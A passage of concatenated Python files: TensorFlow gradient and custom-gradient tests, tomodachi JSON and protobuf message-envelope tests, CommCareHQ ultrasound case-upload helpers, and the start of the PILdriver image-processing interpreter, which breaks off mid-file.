self.assertAllClose(hess_value, hess_actual.reshape((m * m, m * m)))
def testHessian2D_non_square_matrix(self):
m = 3
n = 4
rng = np.random.RandomState([1, 2, 3])
x_value = rng.randn(m, n).astype("float32")
with self.test_session(use_gpu=True):
x = constant_op.constant(x_value)
x_square = math_ops.reduce_sum(
math_ops.matmul(array_ops.transpose(x), x) * 0.5
)
hess = gradients.hessians(x_square, x)[0]
hess_actual = hess.eval()
hess_value = np.bmat([
[elem*np.ones((n, n)) for elem in vec]
for vec in np.eye(m)
]).astype("float32")
self.assertAllEqual((m, n, m, n), hess_actual.shape)
self.assertAllClose(hess_value, hess_actual.reshape((m * n, m * n)))
class IndexedSlicesToTensorTest(test_util.TensorFlowTestCase):
def testIndexedSlicesToTensor(self):
with self.test_session():
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
self.assertAllEqual(np_val.shape, c_sparse.dense_shape.eval())
c_dense = math_ops.multiply(c_sparse, 1.0)
self.assertAllClose(np_val, c_dense.eval())
def testIndexedSlicesToTensorList(self):
with self.test_session():
numpy_list = []
dense_list = []
sparse_list = []
for _ in range(3):
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
numpy_list.append(np_val)
dense_list.append(c)
sparse_list.append(c_sparse)
packed_dense = array_ops.stack(dense_list)
packed_sparse = array_ops.stack(sparse_list)
self.assertAllClose(packed_dense.eval(), packed_sparse.eval())
def testInt64Indices(self):
with self.test_session():
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
c_sparse = ops.IndexedSlices(
c_sparse.values,
math_ops.cast(c_sparse.indices, dtypes.int64), c_sparse.dense_shape)
self.assertAllEqual(np_val.shape, c_sparse.dense_shape.eval())
c_dense = math_ops.multiply(c_sparse, 1.0)
self.assertAllClose(np_val, c_dense.eval())
def testWarnings(self):
# TODO(gunan) Reenable after this issue is fixed:
# https://github.com/google/protobuf/issues/2812
if sys.version_info >= (3, 5):
self.skipTest("Skipped test for Python 3.5+")
# Smaller than the threshold: no warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32), constant([4, 4, 4, 4]))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(0, len(w))
# Greater than or equal to the threshold: warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32), constant([100, 100, 100, 100]))
# "always" filter prevents the warning from being suppressed if it was
# already triggered in a different test.
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(1, len(w))
self.assertTrue(
"with 100000000 elements. This may consume a large amount of memory." in
str(w[0].message))
# Unknown dense shape: warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32),
array_ops.placeholder(dtypes.int32))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(1, len(w))
self.assertTrue(
"of unknown shape. This may consume a large amount of memory." in
str(w[0].message))
class OnlyRealGradientsTest(test_util.TensorFlowTestCase):
def testRealOnly(self):
x = constant_op.constant(7+3j, dtype=dtypes.complex64)
y = math_ops.square(x)
with self.assertRaisesRegexp(
TypeError,
r"Gradients of complex tensors must set grad_ys "
r"\(y\.dtype = tf\.complex64\)"):
gradients.gradients(y, x)
class ResourceCondTest(test_util.TensorFlowTestCase):
def testBasic(self):
gamma = resource_variable_ops.ResourceVariable(
np.random.random((3,)),
dtype="float32", name="gamma")
inputs = array_ops.ones(shape=(3,), dtype="float32")
def TestFn():
output = inputs + gamma
return output
training = array_ops.placeholder_with_default(True, shape=())
output = control_flow_ops.cond(
training, TestFn, lambda: inputs)
loss = output
grads = gradients.gradients(
loss, [gamma])
self.assertTrue(None not in grads)
class CustomGradientTest(test_util.TensorFlowTestCase):
def testCustomGradientTrivial(self):
@custom_gradient.custom_gradient
def MyIdentity(x):
def Grad(dy):
return [3 * dy]
return x, Grad
with ops.Graph().as_default():
x = constant(3.)
y = MyIdentity(MyIdentity(x))
dy = gradients.gradients(y, x)[0]
with session.Session():
self.assertEqual(9., dy.eval())
def testCustomGradient(self):
@custom_gradient.custom_gradient
def MyMultiply(x1, x2):
result = x1 * x2
def Grad(dy):
# Switched the ordering here.
return [dy * x1, dy * x2]
return result, Grad
with ops.Graph().as_default():
x1 = constant(3.)
x2 = constant(5.)
y = MyMultiply(x1, x2)
dy = gradients.gradients(y, [x1, x2])
with session.Session() as sess:
self.assertAllEqual([3., 5.], sess.run(dy))
def testCustomGradientErrors(self):
@custom_gradient.custom_gradient
def F(x):
def Grad(_):
raise RuntimeError("x")
return x, Grad
with ops.Graph().as_default():
x = constant(1.0)
y = F(x)
with self.assertRaises(RuntimeError):
gradients.gradients(y, x)
def testCustomGradientWithVariables(self):
@custom_gradient.custom_gradient
def F(x):
out = core_layers.dense(x, 3, use_bias=False)
def Grad(out_grad, variables=None): # pylint: disable=redefined-outer-name
self.assertEqual(1, len(variables))
grads = gradients.gradients(out, [x, variables[0]], grad_ys=out_grad)
return grads[0], [array_ops.ones((4, 3))]
return out, Grad
with ops.Graph().as_default():
x = array_ops.ones((2, 4))
with variable_scope.variable_scope("f", use_resource=True) as vs:
y = F(x)
all_vars = vs.global_variables()
assert len(all_vars) == 1
grads = gradients.gradients(y, [x, all_vars[0]])
for g in grads:
self.assertTrue(g is not None)
with session.Session() as sess:
sess.run(variables.global_variables_initializer())
dw = sess.run(math_ops.reduce_sum(grads[1]))
self.assertEqual(12., dw)
def testCustomGradientWithVariablesEager(self):
with context.eager_mode():
layer = core_layers.Dense(4, use_bias=False)
@custom_gradient.custom_gradient
def F(x):
out = layer(x)
def Grad(out_grad, variables=None): # pylint: disable=redefined-outer-name
del out_grad
self.assertEqual(1, len(variables))
return (array_ops.ones((3, 2)),
[array_ops.ones((2, 4))])
return out, Grad
x = array_ops.ones((3, 2)) + 2.
with backprop.GradientTape() as tape:
tape.watch(x)
y = F(x)
w, = layer.variables
dx, dw = tape.gradient(y, [x, w])
self.assertEqual(6., math_ops.reduce_sum(dx).numpy())
self.assertEqual(8., math_ops.reduce_sum(dw).numpy())
def testCustomGradientErrorsWithNonResourceVariables(self):
def F(x, use_resource=False):
with variable_scope.variable_scope("f", use_resource=use_resource):
out = core_layers.dense(x, 4, use_bias=False)
def Grad(out_grad, variables=None): # pylint: disable=redefined-outer-name
del out_grad
self.assertEqual(1, len(variables))
return (array_ops.ones((3, 2)), [array_ops.ones((2, 4))])
return out, Grad
@custom_gradient.custom_gradient
def FResource(x):
return F(x, use_resource=True)
@custom_gradient.custom_gradient
def FNonResource(x):
return F(x, use_resource=False)
x = array_ops.ones((3, 2)) + 2.
# Wrapping scope has use_resource=True but inner scope sets to False. Fails.
with variable_scope.variable_scope("vs1", use_resource=True):
with self.assertRaisesWithPredicateMatch(TypeError,
"must be `ResourceVariable`s"):
FNonResource(x)
# Wrapping scope has use_resource=False but inner scope sets to True.
# Passes.
with variable_scope.variable_scope("vs2", use_resource=False):
FResource(x)
def testWithNumpyInputs(self):
with context.eager_mode():
@custom_gradient.custom_gradient
def F(x):
out = x
def Grad(_):
return (None, None)
return out, Grad
x = np.ones((3, 2), dtype=np.float32)
# Smoke test to ensure numpy inputs are accepted
F(x)
def testRVGradientsDynamicCond(self):
with self.test_session():
alpha = resource_variable_ops.ResourceVariable(
np.random.random((1,)),
dtype="float32")
conditional = array_ops.placeholder_with_default(True, shape=())
output = control_flow_ops.cond(
conditional, lambda: alpha * 2, lambda: alpha * 3)
g, = gradients_impl.gradients(output, alpha)
variables.global_variables_initializer().run()
self.assertAllEqual(g.eval(), [2.0])
self.assertAllEqual(g.eval(feed_dict={conditional: False}), [3.0])
class AggregateIndexedSlicesGradientsTest(test_util.TensorFlowTestCase):
def _assert_indexed_slices_equal(self, left, right):
self.assertAllEqual(
self.evaluate(ops.convert_to_tensor(left)),
self.evaluate(ops.convert_to_tensor(right)))
def testNoGradients(self):
self.assertIsNone(gradients_impl._AggregateIndexedSlicesGradients([]))
def testOneGradient(self):
t = math_ops._as_indexed_slices(constant_op.constant(
[[1., 2.], [0, 0], [3., 4.]]))
result = gradients_impl._AggregateIndexedSlicesGradients([t])
self._assert_indexed_slices_equal(t, result)
def testMultipleGradients(self):
t0 = math_ops._as_indexed_slices(constant_op.constant(
[[1., 2.], [0, 0], [3., 4.]]))
t1 = math_ops._as_indexed_slices(constant_op.constant(
[[0., 0.], [5, 6], [7., 8.]]))
total = constant_op.constant(
[[1., 2.], [5, 6], [10., 12.]])
result = gradients_impl._AggregateIndexedSlicesGradients([t0, t1])
self._assert_indexed_slices_equal(total, result)
def testMultipleGradientsWithNones(self):
t0 = math_ops._as_indexed_slices(constant_op.constant(
[[1., 2.], [0, 0], [3., 4.]]))
t1 = math_ops._as_indexed_slices(constant_op.constant(
[[0., 0.], [5, 6], [7., 8.]]))
t3 = None
total = constant_op.constant(
[[1., 2.], [5, 6], [10., 12.]])
result = gradients_impl._AggregateIndexedSlicesGradients([t0, t1, t3])
self._assert_indexed_slices_equal(total, result)
def testMixedTensorAndIndexedSlices(self):
t0 = math_ops._as_indexed_slices(constant_op.constant(
[[1., 2.], [0, 0], [3., 4.]]))
t1 = constant_op.constant(
[[0., 0.], [5, 6], [7., 8.]])
total = constant_op.constant(
[[1., 2.], [5, 6], [10., 12.]])
result = gradients_impl._AggregateIndexedSlicesGradients([t0, t1])
self._assert_indexed_slices_equal(total, result)
if __name__ == "__main__":
googletest.main()
|
|
import json
import os
import signal
import time
from typing import Any
import pytest
from google.protobuf.json_format import MessageToJson
from proto_build.message_pb2 import Person
from run_test_service_helper import start_service
from tomodachi.envelope.proto_build.protobuf.sns_sqs_message_pb2 import SNSSQSMessage # noqa
from tomodachi.validation.validation import RegexMissmatchException, validate_field_regex
def test_json_base(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_service.py", monkeypatch)
instance = services.get("test_dummy")
async def _async() -> None:
data = {"key": "value"}
t1 = time.time()
json_message = await instance.message_envelope.build_message(instance, "topic", data)
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(json_message)
assert result.get("data") == data
assert result.get("metadata", {}).get("data_encoding") == "raw"
assert len(json.dumps(result.get("data"))) == len(json.dumps(data))
assert json.dumps(result.get("data")) == json.dumps(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_json_base_large_message(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_service.py", monkeypatch)
instance = services.get("test_dummy")
async def _async() -> None:
data = ["item {}".format(i) for i in range(1, 10000)]
assert len(json.dumps(data)) > 60000
t1 = time.time()
json_message = await instance.message_envelope.build_message(instance, "topic", data)
assert len(json.dumps(json_message)) < 60000
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(json_message)
assert result.get("metadata", {}).get("data_encoding") == "base64_gzip_json"
assert len(json.dumps(result.get("data"))) == len(json.dumps(data))
assert json.dumps(result.get("data")) == json.dumps(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
t1 = time.time()
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(protobuf_message, Person)
assert type(result.get("data")) is Person
assert result.get("data") == data
assert result.get("metadata", {}).get("data_encoding") == "proto"
assert result.get("data") == data
assert result.get("data").name == data.name
assert result.get("data").id == data.id
assert len(MessageToJson(result.get("data"))) == len(MessageToJson(data))
assert MessageToJson(result.get("data")) == MessageToJson(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base_no_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
result, message_uuid, timestamp = await instance.message_envelope.parse_message(protobuf_message)
assert type(result.get("data")) is not Person
assert type(result.get("data")) is bytes
assert result.get("data") != data
assert result.get("data") == b"\n\x0212\x12\x08John Doe"
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base_bad_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
json_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(json_message, str)
with pytest.raises(AttributeError):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_validation_no_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
instance.message_envelope.validate()
with pytest.raises(Exception):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_validation_bad_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
instance.message_envelope.validate(proto_class=str)
with pytest.raises(Exception):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_validation_function(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_validator(person: Person) -> None:
validate_field_regex(person.name, r"^[a-zA-Z ]+$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_validator)
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_static_validation_function(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_static_validator(person: Person) -> None:
validate_field_regex(person.name, r"^[a-zA-Z ]+$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_static_validator)
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_validation_function_fail(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_validator(person: Person) -> None:
validate_field_regex(person.name, r"^(#?[a-fA-F0-9]{6}|)$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_validator)
with pytest.raises(RegexMissmatchException):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_static_validation_function_fail(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_static_validator(person: Person) -> None:
validate_field_regex(person.name, r"^(#?[a-fA-F0-9]{6}|)$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_static_validator)
with pytest.raises(RegexMissmatchException):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
|
|
from casexml.apps.case.xform import get_case_updates
from corehq.apps.receiverwrapper import submit_form_locally
from couchforms import convert_xform_to_json
from dimagi.utils.couch.database import get_db
from casexml.apps.case.models import CommCareCase
from lxml import etree
import os
from datetime import datetime, timedelta
import uuid
from django.core.files.uploadedfile import UploadedFile
from custom.uth.const import UTH_DOMAIN
import re
def scan_case(scanner_serial, scan_id):
"""
Find the appropriate case for a serial/exam id combo.
Throws an exception if there are more than one (this is
an error that we do not expect to be able to make corrections
for).
"""
# this is shown on device and stored on the case with no leading zeroes
# but has them on the file itself
scan_id = scan_id.lstrip('0')
return get_db().view(
'uth/uth_lookup',
startkey=[UTH_DOMAIN, scanner_serial, scan_id],
endkey=[UTH_DOMAIN, scanner_serial, scan_id, {}],
).one()
def match_case(scanner_serial, scan_id, date=None):
results = scan_case(scanner_serial, scan_id)
if results:
return CommCareCase.get(results['value'])
else:
return None
def get_case_id(patient_xml):
"""
This is the case_id if it's extracted, assumed to be in the PatientID
However, there's a nonzero chance of them either forgetting to scan it
Or putting it in the wrong field like PatientsName
"""
exam_root = etree.fromstring(patient_xml)
case_id = exam_root.find("PatientID").text
if case_id == '(_No_ID_)':
return None
else:
return case_id
def get_study_id(patient_xml):
"""
The GUID the sonosite generates for the particular exam
"""
exam_root = etree.fromstring(patient_xml)
return exam_root.find("SonoStudyInstanceUID").text
def load_template(filename):
xform_template = None
template_path = os.path.join(
os.path.dirname(__file__),
'data',
filename
)
with open(template_path, 'r') as fin:
xform_template = fin.read()
return xform_template
def case_attach_block(key, filename):
return '<n0:%s src="%s" from="local"/>' % (key, os.path.split(filename)[-1])
def render_sonosite_xform(files, exam_uuid, patient_case_id=None):
"""
Render the xml needed to create a new case for a given
screening. This case will be a subcase to the `exam_uuid` case,
which belongs to the patient.
"""
xform_template = load_template('upload_form.xml.template')
case_attachments = [case_attach_block(identifier(f), f) for f in files]
exam_time = datetime.utcnow()
format_dict = {
'time_start': (exam_time - timedelta(seconds=5)).strftime('%Y-%m-%dT%H:%M:%SZ'),
'time_end': exam_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
'modified_date': exam_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
'user_id': 'uth-uploader',
'doc_id': uuid.uuid4().hex,
'case_id': uuid.uuid4().hex,
'patient_case_id': patient_case_id,
'case_attachments': ''.join(case_attachments),
'exam_id': exam_uuid,
'case_name': 'Sonosite Exam - ' + exam_time.strftime('%Y-%m-%d'),
}
final_xml = xform_template % format_dict
return final_xml
def render_vscan_error(case_id):
"""
Render the xml needed add attachments to the patients case.
"""
xform_template = load_template('vscan_error.xml.template')
format_dict = {
'time_start': (datetime.utcnow() - timedelta(seconds=5)).strftime('%Y-%m-%dT%H:%M:%SZ'),
'time_end': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'modified_date': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'user_id': 'uth-uploader',
'doc_id': uuid.uuid4().hex,
'case_id': case_id,
}
final_xml = xform_template % format_dict
return final_xml
def render_vscan_xform(case_id, files):
"""
Render the xml needed add attachments to the patients case.
"""
xform_template = load_template('vscan_form.xml.template')
case_attachments = [
case_attach_block(os.path.split(f)[-1], f) for f in files
]
format_dict = {
'time_start': (datetime.utcnow() - timedelta(seconds=5)).strftime('%Y-%m-%dT%H:%M:%SZ'),
'time_end': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'modified_date': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'user_id': 'uth-uploader',
'doc_id': uuid.uuid4().hex,
'case_id': case_id,
'case_attachments': ''.join(case_attachments),
}
final_xml = xform_template % format_dict
return final_xml
def identifier(filename):
"""
File names are of the format: 09.44.32 hrs __[0000312].jpeg and we need
to filter out the 0000312 part to use as identifier
"""
match = re.search('\[(\d+)\]', filename)
if match:
return 'attachment' + match.group(1)
else:
# if we can't match, lets hope returning the filename works
return filename
def create_case(case_id, files, patient_case_id=None):
"""
Handle case submission for the sonosite endpoint
"""
# we already parsed what we need from this, so can just remove it
# without worrying we will need it later
files.pop('PT_PPS.XML', '')
xform = render_sonosite_xform(files, case_id, patient_case_id)
file_dict = {}
for f in files:
file_dict[f] = UploadedFile(files[f], f)
submit_form_locally(
instance=xform,
attachments=file_dict,
domain=UTH_DOMAIN,
)
# this is a bit of a hack / abstraction violation
# would be nice if submit_form_locally returned info about cases updated
case_ids = {
case_update.id
for case_update in get_case_updates(convert_xform_to_json(xform))
}
return [CommCareCase.get(case_id) for case_id in case_ids]
def attach_images_to_case(case_id, files):
"""
Handle case submission for the vscan endpoint
"""
xform = render_vscan_xform(case_id, files)
file_dict = {}
for f in files:
identifier = os.path.split(f)[-1]
file_dict[identifier] = UploadedFile(files[f], identifier)
submit_form_locally(xform, attachments=file_dict, domain=UTH_DOMAIN)
def submit_error_case(case_id):
"""
Used if something went wrong creating the real vscan
case update.
"""
xform = render_vscan_error(case_id)
submit_form_locally(
instance=xform,
domain=UTH_DOMAIN,
)
def put_request_files_in_doc(request, doc):
for name, f in request.FILES.iteritems():
doc.put_attachment(
f,
name,
)
|
|
#!/Users/kerem/github-stuff/demo-gui-python/py3env/bin/python3
"""PILdriver, an image-processing calculator using PIL.
An instance of class PILDriver is essentially a software stack machine
(Polish-notation interpreter) for sequencing PIL image
transformations. The state of the instance is the interpreter stack.
The only method one will normally invoke after initialization is the
`execute' method. This takes an argument list of tokens, pushes them
onto the instance's stack, and then tries to clear the stack by
successive evaluation of PILdriver operators. Any part of the stack
not cleaned off persists and is part of the evaluation context for
the next call of the execute method.
PILDriver doesn't catch any exceptions, on the theory that these
are actually diagnostic information that should be interpreted by
the calling code.
When called as a script, the command-line arguments are passed to
a PILDriver instance. If there are no command-line arguments, the
module runs an interactive interpreter, each line of which is split into
space-separated tokens and passed to the execute method.
In the method descriptions below, a first line beginning with the string
`usage:' means this method can be invoked with the token that follows
it. Following <>-enclosed arguments describe how the method interprets
the entries on the stack. Each argument specification begins with a
type specification: either `int', `float', `string', or `image'.
All operations consume their arguments off the stack (use `dup' to
keep copies around). Use `verbose 1' to see the stack state displayed
before each operation.
Usage examples:
`show crop 0 0 200 300 open test.png' loads test.png, crops out a portion
of its upper-left-hand corner and displays the cropped portion.
`save rotated.png rotate 30 open test.tiff' loads test.tiff, rotates it
30 degrees, and saves the result as rotated.png (in PNG format).
"""
# by Eric S. Raymond <esr@thyrsus.com>
# $Id$
# TO DO:
# 1. Add PILFont capabilities, once that's documented.
# 2. Add PILDraw operations.
# 3. Add support for composing and decomposing multiple-image files.
#
from __future__ import print_function
from PIL import Image
class PILDriver(object):
verbose = 0
def do_verbose(self):
"""usage: verbose <int:num>
Set verbosity flag from top of stack.
"""
self.verbose = int(self.do_pop())
# The evaluation stack (internal only)
stack = [] # Stack of pending operations
def push(self, item):
"Push an argument onto the evaluation stack."
self.stack.insert(0, item)
def top(self):
"Return the top-of-stack element."
return self.stack[0]
# Stack manipulation (callable)
def do_clear(self):
"""usage: clear
Clear the stack.
"""
self.stack = []
def do_pop(self):
"""usage: pop
Discard the top element on the stack.
"""
return self.stack.pop(0)
def do_dup(self):
"""usage: dup
Duplicate the top-of-stack item.
"""
if hasattr(self, 'format'): # If it's an image, do a real copy
dup = self.stack[0].copy()
else:
dup = self.stack[0]
self.push(dup)
def do_swap(self):
"""usage: swap
Swap the top-of-stack item with the next one down.
"""
self.stack = [self.stack[1], self.stack[0]] + self.stack[2:]
# Image module functions (callable)
def do_new(self):
"""usage: new <int:xsize> <int:ysize> <int:color>:
Create and push a greyscale image of given size and color.
"""
xsize = int(self.do_pop())
ysize = int(self.do_pop())
color = int(self.do_pop())
self.push(Image.new("L", (xsize, ysize), color))
def do_open(self):
"""usage: open <string:filename>
Open the indicated image, read it, push the image on the stack.
"""
self.push(Image.open(self.do_pop()))
def do_blend(self):
"""usage: blend <image:pic1> <image:pic2> <float:alpha>
Replace two images and an alpha with the blended image.
"""
image1 = self.do_pop()
image2 = self.do_pop()
alpha = float(self.do_pop())
self.push(Image.blend(image1, image2, alpha))
def do_composite(self):
"""usage: composite <image:pic1> <image:pic2> <image:mask>
Replace two images and a mask with their composite.
"""
image1 = self.do_pop()
image2 = self.do_pop()
mask = self.do_pop()
self.push(Image.composite(image1, image2, mask))
def do_merge(self):
"""usage: merge <string:mode> <image:pic1>
[<image:pic2> [<image:pic3> [<image:pic4>]]]
Merge top-of stack images in a way described by the mode.
"""
mode = self.do_pop()
bandlist = []
for band in mode:
bandlist.append(self.do_pop())
self.push(Image.merge(mode, bandlist))
# Image class methods
def do_convert(self):
"""usage: convert <string:mode> <image:pic1>
Convert the top image to the given mode.
"""
mode = self.do_pop()
image = self.do_pop()
self.push(image.convert(mode))
def do_copy(self):
"""usage: copy <image:pic1>
Make and push a true copy of the top image.
"""
self.dup()
def do_crop(self):
"""usage: crop <int:left> <int:upper> <int:right> <int:lower>
<image:pic1>
Crop and push a rectangular region from the current image.
"""
left = int(self.do_pop())
upper = int(self.do_pop())
right = int(self.do_pop())
lower = int(self.do_pop())
image = self.do_pop()
self.push(image.crop((left, upper, right, lower)))
def do_draft(self):
"""usage: draft <string:mode> <int:xsize> <int:ysize>
Configure the loader for a given mode and size.
"""
mode = self.do_pop()
xsize = int(self.do_pop())
ysize = int(self.do_pop())
self.push(self.draft(mode, (xsize, ysize)))
def do_filter(self):
"""usage: filter <string:filtername> <image:pic1>
Process the top image with the given filter.
"""
from PIL import ImageFilter
imageFilter = getattr(ImageFilter, self.do_pop().upper())
image = self.do_pop()
self.push(image.filter(imageFilter))
def do_getbbox(self):
"""usage: getbbox
Push left, upper, right, and lower pixel coordinates of the top image.
"""
bounding_box = self.do_pop().getbbox()
self.push(bounding_box[3])
self.push(bounding_box[2])
self.push(bounding_box[1])
self.push(bounding_box[0])
def do_getextrema(self):
"""usage: extrema
Push minimum and maximum pixel values of the top image.
"""
extrema = self.do_pop().extrema()
self.push(extrema[1])
self.push(extrema[0])
def do_offset(self):
"""usage: offset <int:xoffset> <int:yoffset> <image:pic1>
Offset the pixels in the top image.
"""
xoff = int(self.do_pop())
yoff = int(self.do_pop())
image = self.do_pop()
self.push(image.offset(xoff, yoff))
def do_paste(self):
"""usage: paste <image:figure> <int:xoffset> <int:yoffset>
<image:ground>
Paste figure image into ground with upper left at given offsets.
"""
figure = self.do_pop()
xoff = int(self.do_pop())
yoff = int(self.do_pop())
ground = self.do_pop()
if figure.mode == "RGBA":
ground.paste(figure, (xoff, yoff), figure)
else:
ground.paste(figure, (xoff, yoff))
self.push(ground)
def do_resize(self):
"""usage: resize <int:xsize> <int:ysize> <image:pic1>
Resize the top image.
"""
ysize = int(self.do_pop())
xsize = int(self.do_pop())
image = self.do_pop()
self.push(image.resize((xsize, ysize)))
def do_rotate(self):
"""usage: rotate <int:angle> <image:pic1>
Rotate image through a given angle
"""
angle = int(self.do_pop())
image = self.do_pop()
self.push(image.rotate(angle))
def do_save(self):
"""usage: save <string:filename> <image:pic1>
Save image with default options.
"""
filename = self.do_pop()
image = self.do_pop()
image.save(filename)
def do_save2(self):
"""usage: save2 <string:filename> <string:options> <image:pic1>
Save image with specified options.
"""
filename = self.do_pop()
options = self.do_pop()
image = self.do_pop()
image.save(filename, None, options)
def do_show(self):
"""usage: show <image:pic1>
Display and pop the top image.
"""
self.do_pop().show()
def do_thumbnail(self):
"""usage: thumbnail <int:xsize> <int:ysize> <image:pic1>
Modify the top image in the stack to contain a thumbnail of itself.
"""
ysize = int(self.do_pop())
xsize = int(self.do_pop())
self.top().thumbnail((xsize, ysize))
def do_transpose(self):
"""usage: transpose <string:operator> <image:pic1>
Transpose the top image.
"""
transpose = self.do_pop().upper()
image = self.do_pop()
self.push(image.transpose(transpose))
# Image attributes
def do_format(self):
"""usage: format <image:pic1>
Push the format of the top image onto the stack.
"""
self.push(self.do_pop().format)
def do_mode(self):
"""usage: mode <image:pic1>
Push the mode of the top image onto the stack.
"""
self.push(self.do_pop().mode)
def do_size(self):
"""usage: size <image:pic1>
Push the image size on the stack as (y, x).
"""
size = self.do_pop().size
self.push(size[0])
self.push(size[1])
# ImageChops operations
def do_invert(self):
"""usage: invert <image:pic1>
Invert the top image.
"""
from PIL import ImageChops
self.push(ImageChops.invert(self.do_pop()))
def do_lighter(self):
